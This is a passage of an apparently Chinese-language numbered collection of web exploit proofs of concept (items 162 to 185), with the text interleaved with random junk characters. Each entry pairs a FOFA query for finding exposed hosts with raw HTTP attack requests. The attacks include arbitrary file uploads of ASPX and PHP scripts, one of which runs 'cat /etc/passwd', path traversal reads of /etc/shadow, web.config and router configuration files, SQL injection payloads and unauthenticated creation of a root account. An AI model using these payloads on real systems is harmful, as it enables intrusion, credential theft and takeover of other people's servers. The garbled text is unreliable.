$ r. S1 B* g; P0 K<UploadResume xmlns="http://tempuri.org/">
% ?* g6 H' M. j, N<ip>1</ip>* b1 ]6 f1 ]8 M! ]
<fileName>../../../../dizxdell.aspx</fileName>
/ e6 ?3 a9 T1 I4 z' I9 K* k- \; R<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
+ t2 v! [6 Y* s* i; q6 u<tag>3</tag>9 b; C" F% a! }7 H% _
</UploadResume>( ?0 h9 }, H6 z+ E
</soap:Body>/ z' y, ` |3 c1 V6 ]8 I, J
</soap:Envelope>7 z8 }4 H$ j j8 J3 W" m ?
* ]- X1 l' E' H' x8 g2 r$ @! q
http://x.x.x.x/dizxdell.aspx: @; l X; [3 N& a7 ~
4 Z6 K( i& k6 G) `
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传. B. K8 F: T' g9 L+ n* }
FOFA: app="和丰山海-数字标牌"
( ]/ o, d$ a2 T* `( H1 j. CPOST /QH.aspx HTTP/1.16 |. v8 P1 P4 [0 D( t5 ^
Host: x.x.x.x
' P3 B% x, k: G$ O4 G _- [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
# D5 ]* p$ _5 dConnection: close
1 s6 \8 y s ` L1 gContent-Length: 5836 o$ c8 P" r4 ^0 _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey$ F5 y2 T. J/ ?# A/ P) M
Accept-Encoding: gzip
( U* Y9 `% F" N0 a1 b0 S8 s4 B9 E
8 h$ I5 s$ i& }------WebKitFormBoundaryeegvclmyurlotuey8 B) V" Q5 V1 A- l; W: N
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
, M) [: o9 X7 a$ w/ t: yContent-Type: application/octet-stream
; o L" y& s% H# U% ^* U/ W$ M
, F7 u. D" W8 V# a+ l j4 L7 O3 o<% response.write("ujidwqfuuqjalgkvrpqy") %>, S2 A4 `, M, U3 ~7 M6 R9 T
------WebKitFormBoundaryeegvclmyurlotuey6 \% d$ J$ }+ x, o
Content-Disposition: form-data; name="action"8 h- J P: e; E& j; `$ \
7 b0 r& l0 m8 @) o
upload( g f- z5 M7 V+ { C
------WebKitFormBoundaryeegvclmyurlotuey
* T9 S- O1 a6 |5 g% K8 A- cContent-Disposition: form-data; name="responderId"5 p c6 c% j* z8 ]& e [7 c
) Z1 c+ i H& {6 w6 l" P# M
ResourceNewResponder" I8 D& G5 r; y! t8 c
------WebKitFormBoundaryeegvclmyurlotuey3 g$ c. C8 _. A X- X) N! r) M4 s
Content-Disposition: form-data; name="remotePath"
3 r' h7 e+ `( r4 E1 p4 \) u9 j
* F9 b; C* T- S- W) |+ m/opt/resources5 }* R2 J7 h! t
------WebKitFormBoundaryeegvclmyurlotuey--
* D9 B" B$ k/ W; d; V6 L1 b7 m6 `3 W7 | i" F
. @) ?& Z# |0 i4 y7 }3 lhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx7 H L& e6 `5 l8 R# P, d& C
! q; K0 F! s9 i! Q8 d163. 号卡极团分销管理系统 ue_serve.php 任意文件上传0 e# k0 n9 ]( v' \% I; q1 k% x1 \
FOFA: icon_hash="-795291075"* L+ ~: d5 w; [$ I. T# U( R
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
6 R$ p; V: O. l- UHost: x.x.x.x
$ @9 w* p2 w# c$ D) h& uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36. R/ D% y5 k" _
Connection: close. m0 }) G* p5 Z, P
Content-Length: 293; M3 F2 j. r7 U; x
Accept: */*
7 M; ]( O6 ^ q" g% ^. x' jAccept-Encoding: gzip, deflate. r/ |/ Q) A2 B3 {, [) r- T$ c
Accept-Language: zh-CN,zh;q=0.9# }, I7 ?9 b4 c# A* Q
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
. e4 \6 e5 [& C' X% D6 A' O
& t) P6 x v7 D# B0 G------iiqvnofupvhdyrcoqyuujyetjvqgocod* G9 _' M; f7 ^6 p5 T; u5 a
Content-Disposition: form-data; name="name"
" e2 F& S9 @3 N0 I- e3 F) J% o- @' \3 |% C9 H
1.php
+ H' z7 X7 |4 {+ c------iiqvnofupvhdyrcoqyuujyetjvqgocod. X4 e+ Z4 Q6 ^% L6 _
Content-Disposition: form-data; name="upfile"; filename="1.php"# i* M2 s, K, X
Content-Type: image/jpeg
( _8 q v/ ^. N4 _
. ~+ h2 P' p, Y& f5 i6 }+ N5 {* trvjhvbhwwuooyiioxega* d! @/ M; y3 A
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
# @. }9 F4 U3 C$ i! O( m
X8 e" p- m/ `
/ S/ X) Q; M0 \: s; F; f164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传9 |( g0 ^& U# h9 v/ r+ {) S+ {
FOFA: title="智慧综合管理平台登入"' Z8 R; E: ~( S' D" q: a. z
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
2 x: r, K; n' x( G. u0 N: t) x% rHost: x.x.x.x& k4 O% a, b2 X4 j/ Q6 q" O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
+ H' t) ?3 I i0 W0 O5 e4 oContent-Length: 288
) t( e- i2 T- s0 W) {! h. @, vAccept: application/json, text/javascript, */*; q=0.01. j, D. d7 h/ @+ @- k$ D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,* C2 U+ v4 t/ l
Connection: close. A" C6 r; |5 @2 _% s( c
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl& D: r3 ] W# _0 F# z
X-Requested-With: XMLHttpRequest
$ B7 L" d0 _. l/ J# {! i1 E4 fAccept-Encoding: gzip1 a6 y& x$ D+ G
- I8 ~+ `, q' e9 a3 B$ m
------dqdaieopnozbkapjacdbdthlvtlyl4 k" Y) r$ R4 D- P
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"9 U% f( D* Q8 U8 ]+ U' B# |
Content-Type: image/jpeg: d0 E8 R* U1 [ {' i( W O8 B8 |% A; u
2 I$ O: d" w' v# }6 r4 K) d<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
! _: a; i9 m" s1 A7 D- }------dqdaieopnozbkapjacdbdthlvtlyl--6 N# e5 F) k, ]8 J, G* c, M
/ |/ _- @2 n2 p& K4 Z6 a. t2 t
( X4 e% Y. p2 h& C! o- S- M/ _
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx) ^7 n% w8 N. G0 b1 @% x
3 d4 q' O0 F7 N. {( R165. OrangeHRM 3.3.3 SQL 注入
* G4 ~; m" o/ q. {7 B( U/ qCVE-2024-364283 z3 H: G! Q! f7 q
FOFA: app="OrangeHRM-产品"
$ H! X, M) x5 Y) {. bURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
5 S6 I# Y9 B. }
; h1 ^( F1 b8 h; K) U) A
( y1 b+ |4 I: G8 w% N/ k$ \0 W9 _166. 中成科信票务管理平台SeatMapHandler SQL注入
1 u- k+ Z8 X" M3 B: B; mFOFA:body="技术支持:北京中成科信科技发展有限公司"' A o- i [7 ]# r2 l% L/ C
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
2 N$ ~: _$ b5 w) WHost:
' Y6 z4 `2 s0 c* s/ HPragma: no-cache* R# I2 i1 M1 |" {1 _# i
Cache-Control: no-cache% J' d. E2 T& ^# p. Q# s
Upgrade-Insecure-Requests: 1
) X7 X& W: K4 V6 v' _! \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.362 ^1 ^8 { x0 p# O& g- {5 p& k, Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Y# _" @: a0 @/ o t3 L6 IAccept-Encoding: gzip, deflate
T( f! J/ P2 ]6 ~' w( }: W- d4 D- eAccept-Language: zh-CN,zh;q=0.9,en;q=0.8* w4 v$ J4 F/ k0 V* O) T% m
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
: c7 N5 n) V% M; OConnection: close
1 i; E: v/ K0 U" n+ fContent-Type: application/x-www-form-urlencoded
! a9 [- m6 h% jContent-Length: 894 R4 N% C: R5 I- `
/ G( C5 s) F f9 Q* F: BMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE/ N; x+ [ L: h2 C
5 i$ ~! D' \& _7 c9 C' w4 P4 P) ?
167. 精益价值管理系统 DownLoad.aspx任意文件读取
( g4 a7 t" u9 u u+ ^! }FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"/ u9 z ` y+ A# K8 M
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1+ w: G% _5 l u3 x( d/ o
Host:
9 [# d+ T* V/ _) I6 z* @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 l8 Z+ h! {: o! F
Content-Type: application/x-www-form-urlencoded
f2 |4 |7 B( A( X9 {) c' kAccept-Encoding: gzip, deflate3 I$ y+ f2 U$ j" v- }/ e- i
Accept: */*
; c% Y0 D c) W0 E) HConnection: keep-alive
: @4 b/ M( I% w
* R# o: {( Y" y8 M0 e# P. x9 h9 i1 n$ j% e7 V
168. 宏景EHR OutputCode 任意文件读取
1 o- r* X' `$ @# I8 H( C+ U7 p9 GFOFA:app="HJSOFT-HCM"
' p& J9 v4 |4 T# h6 wGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
* }; O. R) E5 i" D6 ~0 wHost: your-ip
0 L# n/ y \" C- iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
! N4 g# L9 J+ j( y* @% [2 w" SContent-Type: application/x-www-form-urlencoded/ w2 j, D$ t7 N( R
Connection: close! L+ ^1 q3 }2 d/ @
' \5 o; g$ K* X" i3 R' q0 g
! l9 l# f m7 R! V6 Z
' r6 z+ I+ G+ f169. 宏景EHR downlawbase SQL注入
3 V( d! z& E5 K1 P. K9 ], DFOFA:app="HJSOFT-HCM"" ] J/ [; ^6 U) P9 n5 W8 h4 u
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1' {: h0 `0 P; b1 v: U& V! J/ @
Host: your-ip
: R9 N& L/ d3 F, FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' u% Z2 f- S9 I% X4 h4 T A
Accept: */*
. _8 I6 V4 _" p$ K, iAccept-Encoding: gzip, deflate
9 x( T/ x7 F. w0 x% W' u/ B/ }Connection: close5 M' D6 d5 \1 \8 V; p* a% ~2 K& p
+ `: k( C# W0 e5 @. u. c2 I& B
9 Q/ O Z. S( S( j
& |0 i& x5 x; h( o+ Y170. 宏景EHR DisplayExcelCustomReport 任意文件读取+ O& z+ S \0 ?: {" |8 C7 @
FOFA:body="/general/sys/hjaxmanage.js"5 d3 i/ k0 i/ B+ t
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1: `4 e% a0 o6 f4 B5 d5 z
Host: balalanengliang7 @! q. |& ^' I% B* p: e5 ^
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 C) l" ~9 R4 c& y9 Z4 Y
Content-Type: application/x-www-form-urlencoded
$ ^8 }, `3 q8 F4 C+ I& P. S( g
) u; k0 y% h$ M! n: ]( Kfilename=../webapps/ROOT/WEB-INF/web.xml/ o6 R$ b. W$ ?* |: K
' _8 F, j$ V4 F9 C7 h
6 a4 D4 A' V+ g4 v8 `5 I171. 通天星CMSV6车载定位监控平台 SQL注入7 L% k: g5 |# [- J! O0 z W y
FOFA:body="/808gps/"! u7 Z1 z; `% F5 l1 C! G
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1- K) q, j3 } m
Host: your-ip
O8 c1 |# X, ?: Y0 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.06 R7 Z2 Y# `6 l' W
Accept: */*
0 u B1 \1 B7 b9 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ Z* J# G U; z
Accept-Encoding: gzip, deflate
" j: L3 Q, C3 ]3 d! kConnection: close
, \8 V4 V: K) k) b: ~: H5 X% r
0 [- x/ C& O, T" {1 S: R; o
p3 m# U) s9 D+ r) k- I
7 V# x8 n. u4 e" U172. DT-高清车牌识别摄像机任意文件读取2 V; }. x# h7 D' k) l
FOFA:app="DT-高清车牌识别摄像机"6 i1 b& C! S+ P7 ]
GET /../../../../etc/passwd HTTP/1.1- F; K' C2 M6 @* N3 w: D/ s
Host: your-ip
+ A5 D4 q$ d% V0 l1 K9 m0 M7 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( C" e1 [* E( ]" d$ d
Accept-Encoding: gzip, deflate
# m. [" S! O- n1 c6 ]4 G: B) K0 [Accept: */*# ?8 f" y- ]+ j& Q0 w
Connection: keep-alive( U8 T" i4 q+ \$ x }, A* I! X
( X% v. ] V5 s8 T# f, f5 b: H+ m L% i, L. K) Z1 h# a, \
6 m' b2 p% F, Z+ V& p+ w+ n4 u173. Check Point 安全网关任意文件读取% E1 U" Q& ?2 u5 T: ~( E4 @
CVE-2024-24919
+ T0 }1 Y8 a- f* E1 k; _0 K1 h. KFOFA:app="Check_Point-SSL-Network-Extender"
, _! M* _! B/ m0 t) {2 A4 {* J' cPOST /clients/MyCRL HTTP/1.1, f3 G2 G$ G: D9 N: _! i1 E2 q
Host: your-ip
1 a" F8 ]7 W/ O# Y/ i$ zContent-Type: application/x-www-form-urlencoded
$ r9 v$ n; z1 Q5 F% J8 U; }9 t
0 ~2 |, M( }4 _! F0 t9 c% ^) g! IaCSHELL/../../../../../../../etc/shadow6 z0 u' e8 Y! C% S
$ f. Y: ?# \$ v N
2 B( D9 K. O7 P J. [9 q
0 d5 X7 S6 N9 V$ ?. m174. 金和OA C6 FileDownLoad.aspx 任意文件读取0 {% r6 e% a( f( u! C
FOFA:app="金和网络-金和OA"2 {6 T3 j6 K4 K6 r
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.13 K& E2 y/ ]# b
Host: your-ip
+ K1 ~: U6 P8 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 W2 x% @9 E0 Y7 a. _0 J" G* \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- K* }/ U0 k P$ RAccept-Encoding: gzip, deflate, br* A0 X0 m7 N+ v$ r4 l
Accept-Language: zh-CN,zh;q=0.9/ H: c0 \6 ]0 i& j. n
Connection: close( Z* k" ~5 \( F- n3 ]: s: A
5 e* t1 W) i! a* t' Q& L
2 F6 p/ v# q9 C9 L+ b. O6 I2 N8 D$ O! D# K
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入4 d4 s/ F- ^# m _3 ^# f
FOFA:app="金和网络-金和OA"
& T1 E% t8 z9 S2 m, x$ A; {& S0 _GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1, ?/ [* M. b' A, I1 V2 C; ]# b
Host:3 F G# }4 ^+ d3 p
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, q5 S$ l' ]; z, D0 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. B/ H0 [; k( E7 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ J9 l2 ], q9 W8 s
Accept-Encoding: gzip, deflate! g* z0 ?) S' \* T+ Z8 x0 [7 N: E
Connection: close% P) x- b( p; R. ~. P
Upgrade-Insecure-Requests: 1
. \* `0 U" K+ m" S, P" a
3 `4 I, D' x# u8 r D+ k- B
3 O$ a2 R6 ~9 \( m176. 电信网关配置管理系统 rewrite.php 文件上传' X# e! ^7 s: N0 Q0 V: `/ H# r
FOFA:body="img/login_bg3.png" && body="系统登录"
6 G, ~0 D7 k* y' Q/ YPOST /manager/teletext/material/rewrite.php HTTP/1.1; M. A( s6 f) P- `
Host: your-ip4 D4 b* b% C/ w+ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' L8 Z+ o: Z! X6 g& \" R9 @6 J+ A UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
$ M9 {9 R7 f/ [1 F/ W) iConnection: close
}/ F8 i7 d ?1 s5 o7 }2 E" H" T7 _7 ?/ q$ s! w
------WebKitFormBoundaryOKldnDPT5 g6 D; Q( k4 B
Content-Disposition: form-data; name="tmp_name"; filename="test.php"- I6 U- q9 I; T; ?, y% D& @
Content-Type: image/png
* }3 F+ X4 `1 j1 E
+ ^4 V, u1 h* s. f& ^" y E<?php system("cat /etc/passwd");unlink(__FILE__);?>% k1 a8 r3 V! J8 O/ N
------WebKitFormBoundaryOKldnDPT/ }* |7 A" S; v" Q5 ^
Content-Disposition: form-data; name="uploadtime"
7 b. n2 E b4 S& t0 V
7 W Y1 D; |" u6 l ; W; F+ u3 Z' _4 q! r
------WebKitFormBoundaryOKldnDPT--: q6 ]1 ~4 p0 L8 h
) v8 @; i; {& J8 a8 ]
2 O' E+ q( g! A6 _8 l
% B) o1 G% k! A/ D7 o
177. H3C路由器敏感信息泄露
2 N( m4 F5 ?2 b2 q/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
9 r4 d7 w/ f: A1 u3 ?/ _; k/userLogin.asp/../actionpolicy_status/../M60.cfg
1 t1 Z* K5 ?9 g4 W9 |" M6 E/userLogin.asp/../actionpolicy_status/../GR8300.cfg! l4 [* E" T6 u5 M
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
+ ?7 L% \0 ^/ {5 g- }$ x2 C! O/userLogin.asp/../actionpolicy_status/../GR3200.cfg3 r( V. f+ J* T7 ]
/userLogin.asp/../actionpolicy_status/../GR2200.cfg0 W3 J4 v' ?0 ?7 `# q! s
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg: H, e! |. a% v! e# z7 b
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg& @" W3 u/ ?. ^2 G4 s9 H) q7 |4 [
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg7 Z( w, U8 J1 r8 c D" k
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
z% G6 r2 X0 {# y6 Q, G k5 l/ }/userLogin.asp/../actionpolicy_status/../ER5200.cfg
( [; a) S0 o8 {/userLogin.asp/../actionpolicy_status/../ER5100.cfg% e; X/ n9 V& @) T' [4 e: ?6 \2 R! P
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
. k' C! O! c8 E$ f/ c: L/userLogin.asp/../actionpolicy_status/../ER3260.cfg M) Q* g% _# @8 n3 l& i% |* `6 C
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
3 [( q& |' b/ F/userLogin.asp/../actionpolicy_status/../ER3200.cfg
) g/ m2 P% x) s% {5 J3 n' ^1 B/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
& E+ R* g. i- e7 @9 t/ u/ a" a/userLogin.asp/../actionpolicy_status/../ER3108G.cfg. H1 m/ |0 ~1 k7 q$ W! o
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
- a6 b' Q4 Z" k/userLogin.asp/../actionpolicy_status/../ER3100.cfg
6 Q6 F* A% M2 o+ O' P @- m/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg0 W) T; S/ D! T7 Y
, s# C r6 s& L* K. b: }
% f0 ? Y2 U, h! \( ^3 [# M
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
9 [1 Z6 B) p. u/ JFOFA:header="/selfservice"0 T. C4 i: m7 _
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
9 C: O$ F& x( B! v& lHost:
" y& @* l1 n, I4 h+ |, V- N, [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ Q: L4 h8 d: m: P& e" L0 `$ {
Content-Length: 252. w0 ?" f9 D$ H6 m
Accept-Encoding: gzip, deflate
1 L9 L1 [- S- y, E& U; q1 v2 c0 JConnection: close4 O: l. q, m N8 a8 k
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l) p: A2 }, r b
-----------------aqutkea7vvanpqy3rh2l) |) o3 x# { g, m4 Q, C
Content-Disposition: form-data; name="12234.txt"; filename="12234"2 J0 e, B# q5 |) \, _: q8 c- o
Content-Type: application/octet-stream3 A) Y- m& T0 C- l& O1 n
Content-Length: 255
2 X3 \' }4 D! ?, N2 L
+ s2 M8 e0 L( z12234
7 }: Y1 A% x/ n: s$ v, j* T-----------------aqutkea7vvanpqy3rh2l--6 n- }. j" h4 u0 G2 o2 w) e$ I0 ^8 u
& _9 R8 S* T) W1 e3 H# ~7 ]
9 k( i7 c0 ~3 ~: z9 Z" G
GET /imc/primepush/%2e%2e/flex/12234.txt
2 f* g8 p6 a6 _+ k9 Q3 V! @. ^
. S+ C5 l" h2 y+ c1 L. p) W; E) d) `$ ]3 o& H
179. 建文工程管理系统存在任意文件读取, k# n+ e7 c* I; T
POST /Common/DownLoad2.aspx HTTP/1.1& j9 `& `2 p, {/ ~% F T
Host: {{Hostname}}' ?- R: Q% A' p& ?' S! q
Content-Type: application/x-www-form-urlencoded
! T) S9 r& Q& [User-Agent: Mozilla/5.0- Q) W* U9 I# ]. V" A! Y9 w
' }/ x$ ^, C( X7 N% e' O( _
path=../log4net.config&Name=& b' S. c" w) g3 E& G
2 w* Z: [ x/ S% f7 G# n6 C% L% z
180. 帮管客 CRM jiliyu SQL注入
# A. n5 U0 a8 W/ |/ ZFOFA:app="帮管客-CRM"
`: s1 a: u: y6 K% z. Y* D) w' D- wGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
1 {" j; g: G1 f! vHost: your-ip0 h k6 M9 N1 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ Q$ @ H, S* s' T3 M* c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: D- u6 G3 _: A Y! ]1 L8 s( iAccept-Encoding: gzip, deflate0 B0 `! g! h( m. `5 e Z
Accept-Language: zh-CN,zh;q=0.9
$ ^7 r5 b$ Q2 I# t$ ^1 NConnection: close
! D, u6 R* o( Y/ S
4 U& U+ d4 R8 G! V/ g- ~- L% a. c6 y2 o
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
$ o" a/ B, n" T0 J( s4 u* `' `FOFA:"PDCA/js/_publicCom.js"3 U D$ [( g n) {8 g/ m
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.12 o r; Y. S/ A# s
Host: your-ip: Y8 h5 ~6 R; k# ?3 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36: P' g2 v' e! g* i! w* A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) J2 `$ C7 n4 r* M bAccept-Encoding: gzip, deflate, br
! H- k: {$ r e6 f; v cAccept-Language: zh-CN,zh;q=0.9
& ]# i2 v/ E9 K5 n( BConnection: close/ x, G, _1 G8 `. {
Content-Type: application/x-www-form-urlencoded
8 X$ i# p0 _/ g" O4 R
& u7 M6 P9 {7 K9 L: q) j& t6 Q
/ p8 y) m5 S6 w! gaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
- u2 q, }* f8 J7 h$ ~) U3 H! C) ]" J9 {1 j) k! h
! D2 ^2 P6 t1 P' i182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建9 V i/ i/ S/ Z) j2 Q
FOFA:"PDCA/js/_publicCom.js"
. |. k1 N, U2 QPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
. v8 N$ z% U6 Q9 @Host: your-ip
+ I+ {1 b" r5 U0 W& |0 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
, Q0 H' A; S6 f+ H# s: M3 E. m) FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% N' F. l" g# V/ ^# ?6 Q, F
Accept-Encoding: gzip, deflate, br
/ g4 P1 Q |. F8 p" N9 vAccept-Language: zh-CN,zh;q=0.9
8 E% ~) [% r. C: C5 i- xConnection: close) I; b6 j1 i# O& s
Content-Type: application/x-www-form-urlencoded/ ]$ H4 t T8 U/ w: [3 v6 `
/ q0 |0 t" o6 T6 |& o; M' x( |$ K
/ g# y$ z. a: u' {
username=test1234&pwd=test1234&savedays=1
" G8 a8 f& n# v9 `& n
5 Z" w, l0 n! d5 x) B2 c/ M1 o( ]' @; w# D1 p
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
. o/ }, S5 |$ ^* gFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"% Z# W8 R. \1 q/ G1 V7 y; a% T
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1. \0 _* T& o% d# C% e7 n
Host: your-ip
2 v5 I! C, M5 r% f$ \8 m }User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' e' U4 R: b) X" M* F6 P- {
Accept-Charset: utf-86 t6 i5 k# V! z& ^, P
Accept-Encoding: gzip, deflate
) r+ A* `& V. }. X( uConnection: close
# C; |! D: U1 D+ i) D
5 A- ]4 e0 s( r4 i/ k
- K# L( M W4 u8 V- a7 S0 Y184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ Z* n9 q3 m1 U" z1 C# U, LFOFA:server="SunFull-Webs"0 N3 h9 d# C% ~" T/ T d% e
POST /soap/AddUser HTTP/1.1" l" `2 t! B8 o, x/ k) r8 }) [
Host: your-ip2 t1 [# x! M3 o3 T% e
Accept-Encoding: gzip, deflate- [8 K$ t" a# k8 h, N5 R* [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
}4 N0 a4 M. l" FAccept: application/xml, text/xml, */*; q=0.01
# {8 S, r$ n* Z$ l$ e7 ZContent-Type: text/xml; charset=utf-8
# E: o0 E _0 B5 Q: fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& A d3 T- |$ WX-Requested-With: XMLHttpRequest
( i% ]& h8 w _; F- i2 t) ]8 Q1 ^* t3 r! u: `+ e$ |
; u' G' I% \3 t- t1 b
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
6 ]' w+ n2 y" ^2 x3 F) I# z1 s
- `( y2 D& D7 b# ^* S; J$ x& T3 D8 y2 O: \5 B+ j+ m
185. 瑞友天翼应用虚拟化系统SQL注入
& L0 k+ x; ^- ?6 s4 f, {version < 7.0.5.19 \) J" f! [7 L# H
